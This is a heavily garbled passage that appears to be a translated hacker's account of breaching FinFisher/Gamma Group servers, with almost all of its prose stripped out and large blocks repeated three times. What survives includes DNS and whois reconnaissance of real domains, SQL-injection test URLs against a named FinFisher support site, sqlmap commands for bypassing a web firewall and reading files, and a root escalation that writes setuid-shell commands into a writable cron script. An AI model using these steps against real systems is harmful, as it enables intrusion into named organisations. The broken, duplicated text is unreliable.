Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated